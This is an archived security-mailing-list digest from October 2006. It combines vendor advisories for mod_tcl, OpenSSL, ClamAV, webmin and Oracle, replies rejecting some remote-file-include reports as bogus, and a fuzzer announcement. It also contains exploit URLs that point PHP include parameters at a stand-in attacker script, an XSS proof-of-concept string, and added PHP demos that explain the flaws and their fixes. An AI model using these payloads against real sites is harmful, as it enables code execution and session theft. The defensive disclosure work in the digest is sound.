Re: adobe php sdk Remote File Include Vulnerabilities

2006-10-24 Thread Mailinglists Address

> www.site.com/adobe_php_sdk_path/libraries/amfphp/amf-core/custom/CachedGateway.php?AMFPHP_BASE=sh3ll?_
All of these reports are bogus (Smarty 2.6.1, CSLH2), as the original
poster obviously does not understand how constants work.

As taken from the PHP manual:

"Constants may only be defined using the *define()* function, not by
simple assignment;"




Re: Smarty-2.6.1 Remote File Include Vulnerabilities

2006-10-24 Thread J. Carlos Nieto
On Mon, 2006-10-23 at 16:30 +, [EMAIL PROTECTED] 

>  
> require_once './config.php';
> require_once SMARTY_DIR . 'Smarty.class.php';
> require_once 'PHPUnit.php';

SMARTY_DIR is a constant, isn't it?

> http://www.site.com/Smarty-2.6.14/unit_test/test_cases.php?SMARTY_DIR=Sh3ll?

But you are passing a variable with value "Sh3ll".

And since variable != constant it won't work, at least in the piece of
code you gave us.

Where is the bug?

-- 
Civilization does not suppress barbarism; it perfects it. -Voltaire
http://xiam.underlife.org




[ GLSA 200610-12 ] Apache mod_tcl: Format string vulnerability

2006-10-24 Thread Raphael Marichez
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory   GLSA 200610-12
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: High
 Title: Apache mod_tcl: Format string vulnerability
  Date: October 24, 2006
  Bugs: #151359
ID: 200610-12

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

A format string vulnerability has been found in Apache mod_tcl, which
could lead to the remote execution of arbitrary code.

Background
==========

Apache mod_tcl is a TCL interpreting module for the Apache 2.x web
server.

Affected packages
=================

    -------------------------------------------------------------------
     Package              /   Vulnerable   /                Unaffected
    -------------------------------------------------------------------
  1  www-apache/mod_tcl         < 1.0.1                      >= 1.0.1

Description
===========

Sparfell discovered format string errors in calls to the set_var
function in tcl_cmds.c and tcl_core.c.

Impact
======

A remote attacker could exploit the vulnerability to execute arbitrary
code with the rights of the user running the Apache server.

Workaround
==========

There is no known workaround at this time.

Resolution
==========

All mod_tcl users should upgrade to the latest version:

# emerge --sync
# emerge --ask --oneshot --verbose ">=www-apache/mod_tcl-1.0.1"

References
==========

  [ 1 ] CVE-2006-4154
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4154

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200610-12.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
[EMAIL PROTECTED] or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
=======

Copyright 2006 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5




InteliEditor (sys_path) Remote File Include Vulnerability

2006-10-24 Thread xorontr
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

InteliEditor (sys_path) Remote File Include Vulnerability

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Author: xoron

Happy Ramadan Bayram to the whole Islamic world..!

How happy is the one who says "I am a Turk"

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

CODE:

include("$sys_path/cfg.editor.inc.php");
include("$sys_path/lang.$lng.inc.php");


-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Exploit:

http://www.hedef.com/[script_path]/lib.editor.inc.php?sys_path=http://evil_script?


-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Thanx: str0ke, kacper, Preddy, Ironfist, Stansar, SHiKaA, Chaos, Nukedx, 
k1tk4t, x_w0x

Thanks: DJR, mdx, R3D4C!D, sakkure, ERNE:)

www.milw0rm.com
www.team-rootshell.com
www.cyber-warrior.org
irc.milw0rm.com #milw0rm

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Script download:
http://puzzle.dl.sourceforge.net/sourceforge/intelieditor/intelieditor.zip

# milw0rm.com [2006-10-24]

Original advisory: http://www.milw0rm.com/exploits/2630


adobe php sdk Remote File Include Vulnerabilities

2006-10-24 Thread crackers_child
#
adobe php sdk Remote File Include Vulnerabilities
#

By Crackers_Child

[EMAIL PROTECTED]

www.sibersavacilar.com

#

Download Script

http://blogs.adobe.com/mikepotter/adobe_php_sdk-060817.zip


#

#
Bug in CachedGateway.php

include_once("app/Gateway.php");
include_once(AMFPHP_BASE . "custom/CachedExecutionAction.php");

#
Exploit
#

www.site.com/adobe_php_sdk_path/libraries/amfphp/amf-core/custom/CachedGateway.php?AMFPHP_BASE=sh3ll?_





#

Greetz:All My Friends !

#


CSLH2.9.9 Remote File Include Vulnerabilities

2006-10-24 Thread crackers_child
#
CSLH2.9.9 Remote File Include Vulnerabilities
#

By Crackers_Child

[EMAIL PROTECTED]

www.sibersavacilar.com

#

Download Script

http://craftysyntax.com/CSLH2.9.9.zip


#

#
Bug 

include_once(API_HOME_DIR . "util.php");
include_once(API_HOME_DIR . "const.php");
include_once(API_HOME_DIR . "stringparser.php");

#
Exploit
#

www.site.com/CSLH2_path/txt-db-api/stringparser.php?API_HOME_DIR=sh3ll?

www.site.com/CSLH2_path/txt-db-api/util.php?API_HOME_DIR=sh3ll?

www.site.com/CSLH2_path/txt-db-api/sql.php?API_HOME_DIR=sh3ll?

www.site.com/CSLH2_path/txt-db-api/resultset.php?API_HOME_DIR=sh3ll?

#

Greetz:All My Friends !

#
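The constants-versus-variables point made in the two replies at the top of this digest, and the genuinely exploitable register_globals include in the InteliEditor post, side by side in an added PHP example. This is not code from the InteliEditor, adobe php sdk or CSLH2 advisories, nor from those projects; the request values, the evil.example host, the temporary include root and the function names are constructed for the demo, and PHP 7.1 or later is assumed.

```php
<?php
// Added example; not code from the InteliEditor, adobe php sdk or CSLH2
// advisories, nor from those projects.  It contrasts the two include
// patterns quoted in this digest:
//   (a) include_once(AMFPHP_BASE . "custom/...");  require_once SMARTY_DIR . '...';
//       a CONSTANT lookup: no request parameter can define a constant.
//   (b) include("$sys_path/cfg.editor.inc.php");
//       a VARIABLE: with register_globals=On and $sys_path never assigned,
//       the request parameter becomes the include path (a real RFI).
// register_globals was removed in PHP 5.4, so it is emulated with extract().
// Run with: php rfi_constant_vs_variable.php  (PHP 7.1+ assumed)
declare(strict_types=1);

// Constructed request, standing in for $_GET.  The trailing '?' is the usual
// exploit trick: whatever the script appends becomes a query string on the
// attacker's host, so "http://evil.example/s.txt?/cfg.editor.inc.php" still
// fetches s.txt.
$query = [
    'AMFPHP_BASE' => 'http://evil.example/s.txt?',
    'sys_path'    => 'http://evil.example/s.txt?',
];
extract($query, EXTR_SKIP);   // what register_globals=On did on every request

// (a) amfphp / Smarty / CSLH pattern: resolving a constant name is unaffected
// by a variable of the same name, however that variable got there.
function resolveConstantInclude(string $constName, string $file): string
{
    if (!defined($constName)) {
        // PHP < 8 warned and used the bare word as a string literal
        // ("AMFPHP_BASEcustom/..."); PHP 8 throws Error.  The attacker's
        // value is not used in either case.
        return "undefined constant $constName (PHP >= 8: Error; older PHP: literal '$constName' prepended)";
    }
    return constant($constName) . $file;
}

// (b) InteliEditor pattern, as the advisory quotes it.  include() of an
// http:// target fetches and executes it when allow_url_include
// (allow_url_fopen before PHP 5.2) is on.
function resolveVariableInclude(?string $sysPath, string $file): string
{
    return "$sysPath/$file";
}

// Hardened form: fix the base directory in code, then refuse anything that
// does not resolve to a real file inside it.  Stream wrappers (http://,
// php://, data:) and ../ escapes never pass this check.
function safeIncludePath(string $baseDir, string $file): ?string
{
    $base = realpath($baseDir);
    $real = realpath($baseDir . '/' . $file);
    if ($base === false || $real === false) {
        return null;
    }
    $prefix = $base . DIRECTORY_SEPARATOR;
    return strncmp($real, $prefix, strlen($prefix)) === 0 ? $real : null;
}

// --- demonstration ---------------------------------------------------------
printf("(a) \$AMFPHP_BASE variable set by request: %s; constant defined: %s\n",
    isset($AMFPHP_BASE) ? 'yes' : 'no', defined('AMFPHP_BASE') ? 'yes' : 'no');
echo "    include target: ", resolveConstantInclude('AMFPHP_BASE', 'custom/CachedExecutionAction.php'), "\n";
echo "(b) include target: ", resolveVariableInclude($sys_path ?? null, 'cfg.editor.inc.php'), "\n";

// Throw-away include root with a config file in it, so the hardened path can
// be exercised offline.
$root = sys_get_temp_dir() . '/rfi_demo_' . getmypid();
if (!is_dir($root)) {
    mkdir($root, 0700);
}
file_put_contents($root . '/cfg.editor.inc.php', "<?php return 'config loaded from ' . __FILE__;");

$sys_path = $root;   // the fix: always assign it; never trust an unset global
foreach (['cfg.editor.inc.php', '../../etc/passwd', 'http://evil.example/s.txt?'] as $candidate) {
    $path   = safeIncludePath($sys_path, $candidate);
    $result = $path === null ? 'REJECTED' : (include $path);
    printf("(c) %-32s => %s\n", $candidate, $result);
}

unlink($root . '/cfg.editor.inc.php');
rmdir($root);
```

Run it with the PHP CLI. Line (a) shows that the request created a variable but no constant, so the amfphp, Smarty and CSLH2 URLs never reach a remote file; line (b) shows the InteliEditor include path built entirely from the request; the (c) lines show the hardened resolver accepting only a file inside the fixed base directory and rejecting both the URL and the ../ traversal. Turning allow_url_include off (and register_globals, where it still exists) removes the remote fetch, but the path check is what also closes the local file inclusion that remains.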


who needs a server ...

2006-10-24 Thread auto113922
For phishing and file downloading, especially when the server is from
"location: I don't know" :) This is kind of cool; normally used for
base64 inline images, I think? In Firefox 2.0 and Opera 9.02 you can
invoke the apps and play from there; check .asx in temp with foo.asf.
Maybe you can do some other things.

[Nine "test" links followed here; their data: URI targets were stripped from the archived message, and the only fragment that survives is http://ie7.com/firefox.jpg.]





Re: Application orders Linux in WebAPP v0.9.9.2.1

2006-10-24 Thread nicolascamino
this bug was discovered by Status-x:

http://www.securityfocus.com/bid/13637/info

and exploit by nikyt0x:

http://www.soulblack.com.ar/repo/tools/sbwebapp.txt


[vuln.sg] CruiseWorks Directory Traversal and Buffer Overflow Vulnerabilities

2006-10-24 Thread vulnpost-remove
[vuln.sg] Vulnerability Research Advisory

CruiseWorks Directory Traversal and Buffer Overflow Vulnerabilities

by Tan Chew Keong
Release Date: 2006-10-24

Summary
---
Two vulnerabilities have been found in CruiseWorks. When exploited, the 
vulnerabilities allow an authenticated user to retrieve arbitrary files 
accessible to the web server process and to execute arbitrary code with 
privileges of the IIS IUSR_MACHINE account.

Tested Versions
---
CruiseWorks Groupware version 1.09c and 1.09d.

Details
---
http://vuln.sg/cruiseworks109d-en.html
http://vuln.sg/cruiseworks109d-jp.html


ProgSys version 0.151 XSS vulnerability

2006-10-24 Thread security
25/10/06

Vigilon Advisory
http://www.vigilon.com/advisories/vg-progsys-24-10-2006.txt

---

Application:   ProgSys
Web Site:      http://www.boesch-it.de/sw/php-scripts/progsys/english/download.php
Versions:      0.151 and below
Platform:      linux, windows, freebsd, sun
Bug:           Cross Site Scripting.
Fix Available: Yes
---

1) Introduction
2) Bug
3) The Code
4) Fix
5) About Vigilon
6) Disclaimer
7) Feedback

===
1) Introduction
===

ProgSys is a support system for application development. Features: data
stored in MySQL, administration interface, support for multiple
languages, support for multiple instances in one database, own
header/footer can be defined for every program, bug tracking, ToDo list,
changelogs, reference list, feature requests, download counter and
newsletter for programs.

==
2) Bug
==

Cross-Site Scripting.


===
3) Proof of concept
===

XSS is possible in almost every file.

example:

/progsys/admin/index.php/>">alert("XSS")

==
4) Fix
==

The author claims these problems were fixed in version 0.152.


==
5) About Vigilon
==

Vigilon Inc. is a security software company that helps organizations,
and the security providers that serve them, reduce business risk while
lowering operational security costs using the Continual Vigilance
platform.

=
6) Disclaimer
=

The information within this paper may change without notice. Use of this
information constitutes acceptance for use in an AS IS condition. There are
NO warranties with regard to this information. In no event shall the author
be liable for any damages whatsoever arising out of or in connection with
the use or spread of this information. Any use of this information is at the
user's own risk.

=
7) Feedback
=

Please send suggestions, updates, and comments to:

[EMAIL PROTECTED]
http://www.vigilon.com

---

Credit:

Moran Zavdi
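Reflected XSS through a path segment, the shape the proof of concept above uses, in an added PHP example. This is not ProgSys code and not part of the Vigilon advisory: that the reflected value is $_SERVER['PHP_SELF'] is an assumption (the advisory does not say which output echoes the input), and the form markup, the $server array and the function names are constructed for the demo.

```php
<?php
// Added example; not ProgSys code and not part of the Vigilon advisory.
// The PoC injects into the path after index.php, the classic shape of a
// page that echoes $_SERVER['PHP_SELF'] straight into a form's action
// attribute.  That cause is an ASSUMPTION here: the advisory does not say
// which output reflects the input.  PHP_SELF carries PATH_INFO, so
// index.php/"><script>...  lands inside the attribute.
// Run with: php progsys_xss_demo.php
declare(strict_types=1);

// Vulnerable rendering: the attribute value is taken verbatim from the request.
function renderFormVulnerable(string $phpSelf): string
{
    return '<form method="post" action="' . $phpSelf . '">' . "\n"
         . '  <input type="submit" value="Save">' . "\n"
         . '</form>';
}

// Hardened rendering: HTML-encode whatever goes into the attribute.  Using
// SCRIPT_NAME (no PATH_INFO) instead of PHP_SELF is a good habit too, but the
// encoding is what closes the hole, so the same attacker value is used here.
function renderFormHardened(string $action): string
{
    $safe = htmlspecialchars($action, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    return '<form method="post" action="' . $safe . '">' . "\n"
         . '  <input type="submit" value="Save">' . "\n"
         . '</form>';
}

// Does a raw <script> open tag survive into the rendered page?  A check of
// this shape over rendered output is the cheapest regression test for a
// reflected XSS fix.
function containsRawScriptTag(string $html): bool
{
    return stripos($html, '<script') !== false;
}

// Constructed request, standing in for $_SERVER on a hit to the PoC URL with
// PATH_INFO enabled (Apache + mod_php behaviour; the browser sends the quote
// percent-encoded and the server decodes it before populating PATH_INFO).
$server = [
    'SCRIPT_NAME' => '/progsys/admin/index.php',
    'PATH_INFO'   => '/"><script>alert("XSS")</script>',
];
$server['PHP_SELF'] = $server['SCRIPT_NAME'] . $server['PATH_INFO'];

$vulnerable = renderFormVulnerable($server['PHP_SELF']);
$hardened   = renderFormHardened($server['PHP_SELF']);

echo "vulnerable (script tag survives: ", containsRawScriptTag($vulnerable) ? 'yes' : 'no', "):\n",
     $vulnerable, "\n\n";
echo "hardened (script tag survives: ", containsRawScriptTag($hardened) ? 'yes' : 'no', "):\n",
     $hardened, "\n";
```

In the vulnerable output the injected quote closes the action attribute and the script tag becomes live markup; in the hardened output the same bytes are rendered as `&quot;&gt;&lt;script&gt;`, inert inside the attribute. The advisory's claim that "almost every file" is affected is consistent with a shared header that builds its form or link targets this way, but that is the same assumption as above, not something the advisory states.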


[SECURITY] [DSA 1199-1] New webmin packages fix input validation problems

2006-10-24 Thread Noah Meyerhans
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- --------------------------------------------------------------------
Debian Security Advisory DSA-1199-1                  [EMAIL PROTECTED]
http://www.debian.org/security/                         Noah Meyerhans
October 23, 2006
- --------------------------------------------------------------------

Package: webmin
Vulnerability  : multiple
Problem type   : remote
Debian-specific: no
CVE Id(s)  : CVE-2005-3912 CVE-2006-3392 CVE-2006-4542
BugTraq ID : 15629 18744 19820
Debian Bug : 341394 381537 391284

Several vulnerabilities have been identified in webmin, a web-based
administration toolkit.

CVE-2005-3912
A format string vulnerability in miniserv.pl could allow an
attacker to cause a denial of service by crashing the
application or exhausting system resources, and could
potentially allow arbitrary code execution.

CVE-2006-3392
Improper input sanitization in miniserv.pl could allow an
attacker to read arbitrary files on the webmin host by providing
a specially crafted URL path to the miniserv http server.

CVE-2006-4542
Improper handling of null characters in URLs in miniserv.pl
could allow an attacker to conduct cross-site scripting attacks,
read CGI program source code, list local directories, and
potentially execute arbitrary code.

For the stable distribution (sarge), these problems have been fixed in
version 1.180-3sarge1.

Webmin is not included in unstable (sid) or testing (etch), so these
problems are not present.

We recommend that you upgrade your webmin (1.180-3sarge1) package.

Upgrade instructions
- --------------------

wget url
will fetch the file for you
dpkg -i file.deb
will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
will update the internal database
apt-get upgrade
will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.

Debian 3.1 (stable)
- -------------------

Stable updates are available for alpha, amd64, arm, hppa, i386, ia64, m68k, 
mips, mipsel, powerpc, s390 and sparc.

Source archives:

  http://security.debian.org/pool/updates/main/w/webmin/webmin_1.180-3sarge1.dsc
Size/MD5 checksum:  703 5e723deaccb3db60794e0cb385666992
  http://security.debian.org/pool/updates/main/w/webmin/webmin_1.180.orig.tar.gz
Size/MD5 checksum:  2261496 ff19d5500955302455e517cb2942c9d0
  http://security.debian.org/pool/updates/main/w/webmin/webmin_1.180-3sarge1.diff.gz
Size/MD5 checksum:    31458 f8fe363e7ccd8fe4072d84cd86a3510e

Architecture independent packages:

  http://security.debian.org/pool/updates/main/w/webmin/webmin-core_1.180-3sarge1_all.deb
Size/MD5 checksum:  1121200 8fa7064325ded44e7f8dbd226b81d9dd
  http://security.debian.org/pool/updates/main/w/webmin/webmin_1.180-3sarge1_all.deb
Size/MD5 checksum:  1097552 34d96210d581dde8ffea7be82e0897f4


  These files will probably be moved into the stable distribution on
  its next update.

- --------------------------------------------------------------------
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: debian-security-announce@lists.debian.org
Package info: `apt-cache show ' and http://packages.debian.org/
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.1 (GNU/Linux)

iD8DBQFFPWexYrVLjBFATsMRAoUMAJoD7NOzzETLIGE+1vYShqxQDZVT4gCfcYfm
f1fqxSNrMBz71bBqOA2hlFk=
=849e
-END PGP SIGNATURE-



Month of Kernel Bugs and fsfuzzer release (0.6)

2006-10-24 Thread L . M . H .

Hi,

Back in March of this year, I was working on fuzzing-related code,
mostly about kernel-land testing (ex. filesystem code). I gave the
initial code of a tool to a Red Hat employee in charge of QA related
tasks (after showing some issues in iso9660 and jfs). During the next
months the code was subject of cosmetic changes, and he added some
improvements (split the test procedure in another file, added gfs and
hfs support, improved usability).

A few days ago interest suddenly rose, as he found out that nearly
all the filesystems supported in the latest Linux kernel revision are
affected by one or more issues (at the very least, a denial of service
concerning a specific operation such as read, write, etc., normally
causing a so-called softlock-up/oops or a hardlock/panic/fs
corruption).

Another Red Hat employee, excited about the tool, 'leaked' the URL to
the LKML [2][3] (even if the code was available in a publicly accessible
repository, it wasn't being distributed actively). As usual, it didn't
bother the people there much ;-)

I was interested in tracking down the issues found with the tool, and
not just out of curiosity. The feeling about 'silent patches' [1] became
stronger when I realized that there was no intention of doing this
publicly by other parties (cough). This is, sadly, a common practice
everywhere.

Thanks to this and some other goodies, the Month of Kernel Bugs will
start on 1st November, and will be announced next Monday (30
Oct). I'm looking for other people interested in providing bugs for
XNU (also for the "good old" Darwin), win32, *BSD, etc. If you
want to contribute, drop me a line. Please note that only 'fresh',
unknown bugs will be accepted, and submissions should be briefly
documented. The goal is to disclose a kernel bug (DoS, privilege
escalation, whatever is interesting) on a daily basis throughout November.

Watch out for silent patches in the git repositories, obscured
bugzilla entries and the usual FUD. It doesn't hurt to get ready for
the usual madness. Note that 'silent' doesn't necessarily mean
'covered up', just improperly described/not considered a security
issue.

Anyway, regarding the tool, these are the filesystems currently
supported (it depends on the packages you have installed in the system,
but these are all the supported ones right now, as of 0.6):
[EMAIL PROTECTED] fsfuzzer-0.6-lmh]# ./fsfuzz --help
./fsfuzz 
(ext3|ext2|vfat|msdos|swap|squashfs|xfs|hfs|gfs2|ntfs|reiserfs|jffs2|iso9660|cramfs|
jfs|minix|bfs)

Tarball available at: http://projects.info-pull.com/mokb/fsfuzzer-0.6-lmh.tgz
And today's partial bugs list:
http://projects.info-pull.com/mokb/fs-bugs-23-10-2006.txt.asc
Key will be made available after November. This is for verification
purposes. Hopefully they will still work by that time, so it shouldn't
be necessary.

The usual disclaimer applies. If you sell or get money from a bug found
with this tool, shame on you ;-). Also, most of the bugs you can
actually find with it are already known, but it's always nice to hear
about new details (and if you've ported it to some other platform,
even better). You're more than welcome to send them. They will be
considered for release in the MoKB, with credit given accordingly.

Kind regards.

[1]: https://bugzilla.redhat.com/bugzilla/show_bug.cgi?id=209907
[2]: http://www.ussg.iu.edu/hypermail/linux/kernel/0610.2/1941.html
[3]: http://www.ussg.iu.edu/hypermail/linux/kernel/0610.2/2169.html


[ GLSA 200610-11 ] OpenSSL: Multiple vulnerabilities

2006-10-24 Thread Raphael Marichez
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory   GLSA 200610-11
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: High
 Title: OpenSSL: Multiple vulnerabilities
  Date: October 24, 2006
  Bugs: #145510
ID: 200610-11

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

OpenSSL contains multiple vulnerabilities including the possible remote
execution of arbitrary code.

Background
==========

OpenSSL is a toolkit implementing the Secure Sockets Layer and Transport
Layer Security protocols, and a general-purpose cryptography library.

Affected packages
=================

    -------------------------------------------------------------------
     Package              /   Vulnerable   /                Unaffected
    -------------------------------------------------------------------
  1  dev-libs/openssl           < 0.9.8d                     >= 0.9.8d
                                                            *>= 0.9.7l

Description
===========

Tavis Ormandy and Will Drewry, both of the Google Security Team,
discovered that the SSL_get_shared_ciphers() function contains a buffer
overflow vulnerability, and that the SSLv2 client code contains a flaw
leading to a crash. Additionally Dr. Stephen N. Henson found that the
ASN.1 handler contains two Denial of Service vulnerabilities: while
parsing an invalid ASN.1 structure and while handling certain types of
public key.

Impact
======

An attacker could trigger the buffer overflow vulnerability by sending
a malicious suite of ciphers to an application using the vulnerable
function, and thus execute arbitrary code with the rights of the user
running the application. An attacker could also consume CPU and/or
memory by exploiting the Denial of Service vulnerabilities. Finally a
malicious server could crash an SSLv2 client through the SSLv2
vulnerability.

Workaround
==========

There is no known workaround at this time.

Resolution
==========

All OpenSSL 0.9.8 users should upgrade to the latest version:

# emerge --sync
# emerge --ask --oneshot --verbose ">=dev-libs/openssl-0.9.8d"

All OpenSSL 0.9.7 users should upgrade to the latest version:

# emerge --sync
# emerge --ask --oneshot --verbose ">=dev-libs/openssl-0.9.7l"

References
==========

  [ 1 ] CVE-2006-2937
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2937
  [ 2 ] CVE-2006-2940
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2940
  [ 3 ] CVE-2006-3738
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3738
  [ 4 ] CVE-2006-4343
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4343

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200610-11.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
[EMAIL PROTECTED] or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
=======

Copyright 2006 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5




[ GLSA 200610-10 ] ClamAV: Multiple Vulnerabilities

2006-10-24 Thread Raphael Marichez
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory   GLSA 200610-10
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: High
 Title: ClamAV: Multiple Vulnerabilities
  Date: October 24, 2006
  Bugs: #151561
ID: 200610-10

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

ClamAV is vulnerable to a heap-based buffer overflow potentially
allowing remote execution of arbitrary code and a Denial of Service.

Background
==========

ClamAV is a GPL virus scanner.

Affected packages
=================

    -------------------------------------------------------------------
     Package              /   Vulnerable   /                Unaffected
    -------------------------------------------------------------------
  1  app-antivirus/clamav       < 0.88.5                     >= 0.88.5

Description
===========

Damian Put and an anonymous researcher reported a potential heap-based
buffer overflow vulnerability in rebuildpe.c responsible for the
rebuilding of an unpacked PE file, and a possible crash in chmunpack.c
in the CHM unpacker.

Impact
======

By sending a malicious attachment to a mail server running ClamAV, or
providing a malicious file to ClamAV through any other method, a remote
attacker could cause a Denial of Service and potentially the execution
of arbitrary code with the permissions of the user running ClamAV.

Workaround
==========

There is no known workaround at this time.

Resolution
==========

All ClamAV users should upgrade to the latest version:

# emerge --sync
# emerge --ask --oneshot --verbose ">=app-antivirus/clamav-0.88.5"

References
==========

  [ 1 ] Original commit log
http://sourceforge.net/project/shownotes.php?release_id=455799
  [ 2 ] CVE-2006-4182
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4182

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200610-10.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
[EMAIL PROTECTED] or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
=======

Copyright 2006 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5




Modify Data via Inline Views

2006-10-24 Thread ak
Name              Modify Data via Inline Views (8107967) [DB09]
Systems Affected  Oracle 9i - 10g Rel. 2
Severity          High Risk
Category          Unauthorized Access
Vendor URL        http://www.oracle.com/
Author            Alexander Kornbrust (ak at red-database-security.com)
Advisory          18 October 2006 (V 1.00)
Advisory URL      http://www.red-database-security.com/advisory/oracle_modify_data_via_inline_views.html

Details
###
Updates, deletes and inserts are possible with minimal privileges via inline
views. A user with CREATE SESSION only can insert/update/delete data (e.g. in
the DUAL table). This bug is similar to, but not identical to, the bug fixed
in the July 2006 CPU (Modify Data via views). No workarounds are available.


Samples
###
delete from (specially crafted inline view)
insert into (specially crafted inline view)
update (specially crafted inline view)


Patch Information
#
Apply the patches for Oracle CPU October 2006.


History
###
24-jul-2006 Oracle secalert was informed about a variant of the create view bug.
18-oct-2006 Oracle published CPU October 2006 [DB09]
18-oct-2006 Advisory published


Additional Information
##
An analysis of the Oracle CPU Oct 2006 is available here 
http://www.red-database-security.com/advisory/oracle_cpu_oct_2006.html


SQL Injection in package SYS.DBMS_SQLTUNE_INTERNAL

2006-10-24 Thread ak
Name              SQL Injection in package SYS.DBMS_SQLTUNE_INTERNAL (6980745) [DB10]
Systems Affected  Oracle 8i-10g Rel. 2
Severity          High Risk
Category          SQL Injection
Vendor URL        http://www.oracle.com/
Author            Alexander Kornbrust (ak at red-database-security.com)
Advisory          18 October 2006 (V 1.00)
Advisory URL      http://www.red-database-security.com/advisory/oracle_sql_injection_dbms_sqltune_internal.html

Details
###
The package DBMS_SQLTUNE_INTERNAL contains SQL injection vulnerabilities in
I_SET_TUNING_PARAMETER and SELECT_SQLSET. Oracle fixed this by using bind
variables in the affected dynamic SQL statements.


Patch Information
#
Apply the patches for Oracle CPU October 2006.


History
###
1-nov-2005 Oracle secalert was informed
18-oct-2006 Oracle published CPU October 2006 [DB13]
18-oct-2006 Advisory published


Additional Information
##
An analysis of the Oracle CPU Oct 2006 is available here 
http://www.red-database-security.com/advisory/oracle_cpu_oct_2006.html